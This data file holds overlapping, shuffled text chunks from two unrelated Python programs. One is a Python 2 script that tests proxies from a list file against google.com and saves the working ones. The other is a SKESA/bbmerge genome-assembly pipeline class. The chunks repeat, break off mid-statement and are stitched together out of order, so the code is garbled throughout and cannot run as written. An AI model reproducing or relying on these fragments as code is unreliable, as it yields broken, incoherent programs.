sock=urllib2.urlopen(req) except urllib2.HTTPError, e:", "socket.setdefaulttimeout(180) # read the list of proxy IPs in proxyList def is_bad_proxy(pip): try:", "detail: print \"ERROR:\", detail return 1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f =", "0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList = []; for line in", "req=urllib2.Request('http://www.google.com') # change the url address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error", "in proxyList: if is_bad_proxy(item): print \"Bad Proxy\", item count = count + 1;", "the url address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error code: ', e.code", "print \"Bad Proxy\", item count = count + 1; else: x.write(item); x.write('\\n'); print", "urllib2.ProxyHandler({'http': pip}) opener = 
urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change", "print \"ERROR:\", detail return 1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename)", "proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com')", "for item in proxyList: if is_bad_proxy(item): print \"Bad Proxy\", item count = count", "e.code return e.code except Exception, detail: print \"ERROR:\", detail return 1 return 0", "line = line.rstrip('\\n') proxyList.append(line) print proxyList x = open(\"new.txt\", 'w') count = 0", "count + 1; else: x.write(item); x.write('\\n'); print \"SO MANY BAD PROXIES \" +", "is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')]", "IPs in proxyList def is_bad_proxy(pip): try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler)", "\"ERROR:\", detail return 1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList", "x = open(\"new.txt\", 'w') count = 0 for item in proxyList: if is_bad_proxy(item):", "urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print", "# change the url address here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error code:", "try: proxy_handler = urllib2.ProxyHandler({'http': pip}) opener = urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener)", "1 return 0 filename = \"proxylist-2016-11-01-01-32-21.txt\" f = open(filename) proxyList = []; for", "line.rstrip('\\n') 
proxyList.append(line) print proxyList x = open(\"new.txt\", 'w') count = 0 for item", "e.code except Exception, detail: print \"ERROR:\", detail return 1 return 0 filename =", "f = open(filename) proxyList = []; for line in f: line = line.rstrip('\\n')", "= urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url address", "here sock=urllib2.urlopen(req) except urllib2.HTTPError, e: print 'Error code: ', e.code return e.code except", "urllib2.build_opener(proxy_handler) opener.addheaders = [('User-agent', 'Mozilla/5.0')] urllib2.install_opener(opener) req=urllib2.Request('http://www.google.com') # change the url address here", "print proxyList x = open(\"new.txt\", 'w') count = 0 for item in proxyList:", "Proxy\", item count = count + 1; else: x.write(item); x.write('\\n'); print \"SO MANY", "urllib2, socket socket.setdefaulttimeout(180) # read the list of proxy IPs in proxyList def", "return e.code except Exception, detail: print \"ERROR:\", detail return 1 return 0 filename", "[]; for line in f: line = line.rstrip('\\n') proxyList.append(line) print proxyList x =", "1; else: x.write(item); x.write('\\n'); print \"SO MANY BAD PROXIES \" + str(count) x.close()" ]
[ "contigs=sample.general.assemblyfile) # If there are no fastq files, populate the metadata appropriately else:", "Create a report with the total number of reads, and the number of", ":param err_log: bbmerge outputs the stats in the error file :return: num_reads, the", "number of paired readds \"\"\" # Initialise variables num_reads = 0 paired_reads =", "If the report exists, open it to determine which samples have already been", "sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start", "as error_log: # Extract the necessary information for line in error_log: if 'Pairs:'", "not in lines: with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod", "the name of the filtered assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) #", "reads, and the number of reads that could be paired from the bbmerge", "inputobject.starttime self.cpus = inputobject.cpus self.path = inputobject.path self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath", "line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self):", "the assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None)", "Run skesa to assemble genomes \"\"\" with progressbar(self.metadata) as bar: for sample in", "as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse the outputs", "to the report if sample.name not in lines: with open(report, 'a+') as report_file:", 
"merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) with open(log,", "in line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine whether", "make_path(outpath) # Merge path - keep all the merged FASTQ files in one", "name of the unfiltered spades assembly output file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile)", "paired-end if len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path", "= os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total number of reads, and the number", "Set the name of the filtered assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name))", "- keep all the merged FASTQ files in one directory merge_path = os.path.join(self.path,", "= sample.general.trimmedcorrectedfastqfiles # Set the the forward fastq files sample.general.assemblyfastq = fastqfiles forward", "' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above, but use", "If there are no fastq files, populate the metadata appropriately else: sample.general.assembly_output =", "results to the report if sample.name not in lines: with open(report, 'a+') as", "returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) with open(log, 'w') as", "number of reads, and the number of reads that could be paired :param", "'r') as report_file: for line in report_file: lines.append(line.split(',')[0]) # Add the results to", "\"\"\" Run skesa to assemble genomes \"\"\" with progressbar(self.metadata) as bar: for sample", "try: if 
sample.general.trimmedcorrectedfastqfiles: # If the sample is a pure isolate, assemble it.", "fastq files sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0] gz = True if '.gz'", "name of the filtered assembly file filtered_outputfile = os.path.join(self.path, 'raw_assemblies', '{}.fasta'.format(sample.name)) # Set", "assembly output file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly", "as a metagenome \"\"\" # Set the assembly file to 'NA' as assembly", "try: if not os.path.isfile(sample.general.mergedreads): # Run the merging command out, err, cmd =", "os.path.isfile(report): with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the", "shutil import os __author__ = 'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def", "lines = list() with open(report, 'r') as report_file: for line in report_file: lines.append(line.split(',')[0])", "Parse the outputs from bbmerge to extract the total number of reads, as", "None, None) def merge(self, sample): \"\"\" Use bbmerge to merge paired FASTQ files", "python3 from olctools.accessoryFunctions.accessoryFunctions import make_path, run_subprocess, write_to_logfile from genewrappers.biotools import bbtools from subprocess", "lines: with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log):", "report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the report exists, open it to", "= 'NA' sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start =", "Set 
the assembly file to 'NA' as assembly is not desirable for metagenomes", "with open(err_log, 'r') as error_log: # Extract the necessary information for line in", "the .bestassembly attribute to 'NA' \"\"\" for sample in self.metadata: try: # Set", "sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and not", "bar: for sample in bar: # Initialise the assembly command sample.commands.assemble = str()", "'merged_reads') make_path(outpath) # Merge path - keep all the merged FASTQ files in", "bbmerge outputs the stats in the error file :return: num_reads, the total number", "sample): \"\"\" Use bbmerge to merge paired FASTQ files for use in metagenomics", "# Ensure that the assembly isn't just an empty file if size ==", "fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--use_paired_ends", "report_file: for line in report_file: lines.append(line.split(',')[0]) # Add the results to the report", "in lines: with open(report, 'a+') as report_file: report_file.write('{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def", "(CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set the name of the report to store", "os.path.join(outpath, 'log') error = os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads): # Run the", "for use in metagenomics pipelines. 
Create a report with the total number of", "the pre-metagenome pipeline try: status = sample.run.Description except AttributeError: status = 'unknown' if", "sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run the assembly out,", "the stats in the error file :return: num_reads, the total number of reads,", "not os.path.isfile(report): with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If", "'merged_metagenomes.csv') # Extract the total number of reads, and the number of reads", "settings for the assembler else: sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} '", "from bbmerge to extract the total number of reads, as well as the", "shutil.copyfile(sample.general.bestassemblyfile, filtered_outputfile) else: sample.general.bestassemblyfile = 'NA' # Add the name and path of", "set the .bestassembly attribute to 'NA' \"\"\" for sample in self.metadata: try: #", "desirable for metagenomes sample.general.assemblyfile = 'NA' # Can only merge paired-end if len(sample.general.fastqfiles)", "report with the total number of reads, and the number of reads that", "paired_reads, number of paired readds \"\"\" # Initialise variables num_reads = 0 paired_reads", "of reads, and the number of reads that could be paired from the", "IndexError): delattr(sample.general, 'mergedreads') # Set the name of the report to store the", "it to determine which samples have already been added - useful if re-running", "None, None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) def merge(self, sample): \"\"\"", "err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err, 
self.logfile, sample.general.logout, sample.general.logerr,", ".format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above, but use single read settings for", "'NA' # Add the name and path of the filtered file to the", "one directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the name of the", "already been added - useful if re-running # the analysis else: lines =", "could be paired from the bbmerge # err stream num_reads, num_pairs = self.reads(error)", "file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly isn't just", "be paired :param sample: metadata sample object flagged as a metagenome \"\"\" #", "sample.general.bestassemblyfile = 'NA' # Add the name and path of the filtered file", "results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total number of reads, and", "metagenomes sample.general.assemblyfile = 'NA' # Can only merge paired-end if len(sample.general.fastqfiles) == 2:", "def best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta output file from the assembler is", "#!/usr/bin/env python3 from olctools.accessoryFunctions.accessoryFunctions import make_path, run_subprocess, write_to_logfile from genewrappers.biotools import bbtools from", "with open(error, 'w') as error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set", "= line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta output", "file from the assembler is present. 
If not, set the .bestassembly attribute to", "If there are two fastq files if len(fastqfiles) == 2: # Set the", "# Extract the necessary information for line in error_log: if 'Pairs:' in line:", "with the total number of reads, and the number of reads that could", "= inputobject.path self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath make_path(os.path.join(self.path, 'BestAssemblies')) make_path(os.path.join(self.path, 'raw_assemblies')) make_path(self.reportpath)", "exists, open it to determine which samples have already been added - useful", "{fastqfiles} --cores {threads} ' \\ '--use_paired_ends --vector_percent 1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles),", "present. If not, set the .bestassembly attribute to 'NA' \"\"\" for sample in", "line in error_log: if 'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in", ".bestassembly attribute to 'NA' \"\"\" for sample in self.metadata: try: # Set the", "'NA' as assembly is not desirable for metagenomes sample.general.assemblyfile = 'NA' # Can", "to extract the total number of reads, as well as the number of", "to store the metagenome file merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract", "self.start = inputobject.starttime self.cpus = inputobject.cpus self.path = inputobject.path self.logfile = inputobject.logfile self.reportpath", "'metagenome': self.merge(sample) else: # Set the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output)", "flagged as a metagenome \"\"\" # Set the assembly file to 'NA' as", "the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name))", 
"sample.general.logout, sample.general.logerr, None, None) with open(log, 'w') as log_file: log_file.write(out) with open(error, 'w')", "__init__(self, inputobject): self.metadata = inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus = inputobject.cpus self.path =", "metagenome file merging results report = os.path.join(self.reportpath, 'merged_metagenomes.csv') # Extract the total number", "--cores {threads} ' \\ '--use_paired_ends --vector_percent 1 ' \\ '--contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus,", "'adamkoziol' class Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa to", "Same as above, but use single read settings for the assembler else: sample.commands.assemble", "sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles: # If the sample is a pure", "'err') try: if not os.path.isfile(sample.general.mergedreads): # Run the merging command out, err, cmd", "attribute to 'NA' \"\"\" for sample in self.metadata: try: # Set the name", "'{}.fasta'.format(sample.name)) # Set the name of the unfiltered spades assembly output file if", "os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly isn't just an empty file if size", "FASTQ files in one directory merge_path = os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the", "a metagenome \"\"\" # Set the assembly file to 'NA' as assembly is", "'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles", "Initialise the assembly command sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles: # If the", "= inputobject.cpus self.path = 
inputobject.path self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath make_path(os.path.join(self.path, 'BestAssemblies'))", "If the report doesn't exist, create it with the header and the results", "the log file with open(err_log, 'r') as error_log: # Extract the necessary information", "threads=self.cpus, contigs=sample.general.assemblyfile) # Same as above, but use single read settings for the", "sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0] gz = True if '.gz' in forward", "# Run the merging command out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True,", "bar: # Initialise the assembly command sample.commands.assemble = str() try: if sample.general.trimmedcorrectedfastqfiles: #", "for sample in bar: # Initialise the assembly command sample.commands.assemble = str() try:", "= str() try: if sample.general.trimmedcorrectedfastqfiles: # If the sample is a pure isolate,", "that could be paired :param err_log: bbmerge outputs the stats in the error", "the the forward fastq files sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0] gz =", "gz = True if '.gz' in forward else False # If there are", "2: # Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles}", "self.path = inputobject.path self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath make_path(os.path.join(self.path, 'BestAssemblies')) make_path(os.path.join(self.path, 'raw_assemblies'))", "fastq files if len(fastqfiles) == 2: # Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7", "in the error file :return: num_reads, the total number of reads, paired_reads, number", "the unfiltered spades assembly output file if os.path.isfile(sample.general.assemblyfile): size = os.path.getsize(sample.general.assemblyfile) # Ensure", "Add the name and path of 
the filtered file to the metadata sample.general.filteredfile", "fastq files, populate the metadata appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA'", "the outputs from bbmerge to extract the total number of reads, as well", "isn't just an empty file if size == 0: sample.general.bestassemblyfile = 'NA' else:", "True if '.gz' in forward else False # If there are two fastq", "'mergedreads') # Set the name of the report to store the metagenome file", "log_file.write(out) with open(error, 'w') as error_file: error_file.write(err) except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') #", "there are no fastq files, populate the metadata appropriately else: sample.general.assembly_output = 'NA'", "number of reads that could be paired :param err_log: bbmerge outputs the stats", "in metagenomics pipelines. Create a report with the total number of reads, and", "self.merge(sample) else: # Set the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile", "write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None,", "name and path of the filtered file to the metadata sample.general.filteredfile = filtered_outputfile", "run_subprocess, write_to_logfile from genewrappers.biotools import bbtools from subprocess import CalledProcessError from click import", "self.cpus = inputobject.cpus self.path = inputobject.path self.logfile = inputobject.logfile self.reportpath = inputobject.reportpath make_path(os.path.join(self.path,", "import logging import shutil import os __author__ = 'adamkoziol' class Skesa(object): def main(self):", "sample.general.bestassemblyfile = 'NA' def __init__(self, inputobject): self.metadata = 
inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus", ":return: num_reads, the total number of reads, paired_reads, number of paired readds \"\"\"", "sample.general.trimmedcorrectedfastqfiles: # If the sample is a pure isolate, assemble it. Otherwise, run", "'{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set the", "status = sample.run.Description except AttributeError: status = 'unknown' if status == 'metagenome': self.merge(sample)", "= inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus = inputobject.cpus self.path = inputobject.path self.logfile =", "os.path.join(merge_path, '{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error = os.path.join(outpath, 'err') try: if not", "self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa to assemble genomes \"\"\" with progressbar(self.metadata)", "number of reads, as well as the number of reads that could be", "in self.metadata: try: # Set the name of the filtered assembly file filtered_outputfile", "to 'NA' \"\"\" for sample in self.metadata: try: # Set the name of", "empty file if size == 0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile = sample.general.assemblyfile", "else: sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--vector_percent 1 --contigs_out", "file to the metadata sample.general.filteredfile = filtered_outputfile except AttributeError: sample.general.assemblyfile = 'NA' sample.general.bestassemblyfile", "'{}_paired.fastq.gz'.format(sample.name)) log = os.path.join(outpath, 'log') error = os.path.join(outpath, 'err') try: if not os.path.isfile(sample.general.mergedreads):", "'merged_reads') make_path(merge_path) # Set the name of the merged, and unmerged 
files sample.general.mergedreads", "object flagged as a metagenome \"\"\" # Set the assembly file to 'NA'", "== 'metagenome': self.merge(sample) else: # Set the output directory sample.general.assembly_output = os.path.join(sample.general.outputdirectory, 'assembly_output')", "with open(report, 'r') as report_file: for line in report_file: lines.append(line.split(',')[0]) # Add the", "@staticmethod def reads(err_log): \"\"\" Parse the outputs from bbmerge to extract the total", "sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--vector_percent 1 --contigs_out {contigs}'\\", "# If the report doesn't exist, create it with the header and the", "os.path.join(sample.general.outputdirectory, 'assembly_output') make_path(sample.general.assembly_output) sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name))", "= 'NA' except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA'", "are no fastq files, populate the metadata appropriately else: sample.general.assembly_output = 'NA' sample.general.assemblyfastq", "of reads, and the number of reads that could be paired :param sample:", "contigs=sample.general.assemblyfile) # Same as above, but use single read settings for the assembler", "'.gz' in forward else False # If there are two fastq files if", "paired=num_pairs)) # If the report exists, open it to determine which samples have", "0 paired_reads = 0 # Open the log file with open(err_log, 'r') as", "bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None, None) with", 
"genewrappers.biotools import bbtools from subprocess import CalledProcessError from click import progressbar import logging", "sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA' if sample.commands.assemble and not os.path.isfile(sample.general.assemblyfile): # Run", "elif 'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads def best_assemblyfile(self): \"\"\"", "necessary information for line in error_log: if 'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip()", "use single read settings for the assembler else: sample.commands.assemble = 'skesa --fastq {fastqfiles}", "from the first sample if not os.path.isfile(report): with open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n'", "as well as the number of reads that could be paired :param err_log:", "num_reads, the total number of reads, paired_reads, number of paired readds \"\"\" #", "the contigs.fasta output file from the assembler is present. 
If not, set the", "sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles = 'NA' sample.general.bestassemblyfile = 'NA' if", "an empty file if size == 0: sample.general.bestassemblyfile = 'NA' else: sample.general.bestassemblyfile =", "the results to the report if sample.name not in lines: with open(report, 'a+')", "Skesa(object): def main(self): self.skesa_assemble() self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa to assemble genomes", "reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa --fastq {fastqfiles} --cores {threads} ' \\", ".format(fastqfiles=','.join(fastqfiles), threads=self.cpus, contigs=sample.general.assemblyfile) # If there are no fastq files, populate the metadata", "files if len(fastqfiles) == 2: # Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble", "not os.path.isfile(sample.general.assemblyfile): # Run the assembly out, err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile,", "open(report, 'w') as report_file: report_file.write('Sample,TotalReads,PairedReads\\n{sample},{total},{paired}\\n' .format(sample=sample.name, total=num_reads, paired=num_pairs)) # If the report exists,", "= run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile, sample.general.logout,", "'skesa --fastq {fastqfiles} --cores {threads} ' \\ '--vector_percent 1 --contigs_out {contigs}'\\ .format(fastqfiles=','.join(fastqfiles), threads=self.cpus,", "of the report to store the metagenome file merging results report = os.path.join(self.reportpath,", "error_log: if 'Pairs:' in line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads", "if 'Pairs:' in 
line: num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads =", "paired_reads def best_assemblyfile(self): \"\"\" Determine whether the contigs.fasta output file from the assembler", "merging command out, err, cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err,", "def skesa_assemble(self): \"\"\" Run skesa to assemble genomes \"\"\" with progressbar(self.metadata) as bar:", "cmd = bbtools.bbmerge(forward_in=sorted(sample.general.trimmedcorrectedfastqfiles)[0], merged_reads=sample.general.mergedreads, mix=True, returncmd=True, threads=self.cpus) write_to_logfile(out, err, self.logfile, sample.general.logout, sample.general.logerr, None,", "could be paired :param sample: metadata sample object flagged as a metagenome \"\"\"", "if len(fastqfiles) == 2: # Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble =", "sample.general.assemblyfile = os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles", "If the sample is a pure isolate, assemble it. 
Otherwise, run the pre-metagenome", "--fastq {fastqfiles} --cores {threads} ' \\ '--use_paired_ends --vector_percent 1 ' \\ '--contigs_out {contigs}'\\", "len(fastqfiles) == 2: # Set the reverse fastq name https://github.com/ncbi/SKESA/issues/7 sample.commands.assemble = 'skesa", "reads(err_log): \"\"\" Parse the outputs from bbmerge to extract the total number of", "sample.general.assemblyfastq = 'NA' sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq =", "self.best_assemblyfile() def skesa_assemble(self): \"\"\" Run skesa to assemble genomes \"\"\" with progressbar(self.metadata) as", "inputobject.runmetadata.samples self.start = inputobject.starttime self.cpus = inputobject.cpus self.path = inputobject.path self.logfile = inputobject.logfile", ".format(sample=sample.name, total=num_reads, paired=num_pairs)) @staticmethod def reads(err_log): \"\"\" Parse the outputs from bbmerge to", "the assembly file to 'NA' as assembly is not desirable for metagenomes sample.general.assemblyfile", "the report doesn't exist, create it with the header and the results from", "num_pairs = self.reads(error) # If the report doesn't exist, create it with the", "os.path.join(sample.general.outputdirectory, 'merged_reads') make_path(outpath) # Merge path - keep all the merged FASTQ files", "open(err_log, 'r') as error_log: # Extract the necessary information for line in error_log:", "except (CalledProcessError, IndexError): delattr(sample.general, 'mergedreads') # Set the name of the report to", "forward fastq files sample.general.assemblyfastq = fastqfiles forward = fastqfiles[0] gz = True if", "sample.run.Description except AttributeError: status = 'unknown' if status == 'metagenome': self.merge(sample) else: #", "reads, as well as the number of reads that could be paired :param", "the sample is a pure isolate, assemble it. 
Otherwise, run the pre-metagenome pipeline", "sample in bar: # Initialise the assembly command sample.commands.assemble = str() try: if", "progressbar(self.metadata) as bar: for sample in bar: # Initialise the assembly command sample.commands.assemble", "err = run_subprocess(sample.commands.assemble) write_to_logfile(sample.commands.assemble, sample.commands.assemble, self.logfile, sample.general.logout, sample.general.logerr, None, None) write_to_logfile(out, err, self.logfile,", "Otherwise, run the pre-metagenome pipeline try: status = sample.run.Description except AttributeError: status =", "os.path.join(self.path, 'merged_reads') make_path(merge_path) # Set the name of the merged, and unmerged files", "samples have already been added - useful if re-running # the analysis else:", "bbtools from subprocess import CalledProcessError from click import progressbar import logging import shutil", "= os.path.getsize(sample.general.assemblyfile) # Ensure that the assembly isn't just an empty file if", "err_log: bbmerge outputs the stats in the error file :return: num_reads, the total", "'NA' sample.general.bestassemblyfile = 'NA' except AttributeError: sample.general.assembly_output = 'NA' sample.general.assemblyfastq = 'NA' sample.general.trimmedcorrectedfastqfiles", "'NA' # Can only merge paired-end if len(sample.general.fastqfiles) == 2: outpath = os.path.join(sample.general.outputdirectory,", "os.path.join(sample.general.assembly_output, '{name}_unfiltered.fasta' .format(name=sample.name)) sample.general.bestassemblyfile = os.path.join(sample.general.assembly_output, '{name}.fasta' .format(name=sample.name)) fastqfiles = sample.general.trimmedcorrectedfastqfiles # Set", "num_reads = line.split('\\t')[-1].rstrip() elif 'Joined:' in line: paired_reads = line.split('\\t')[-2].rstrip() return num_reads, paired_reads", "pipelines. 
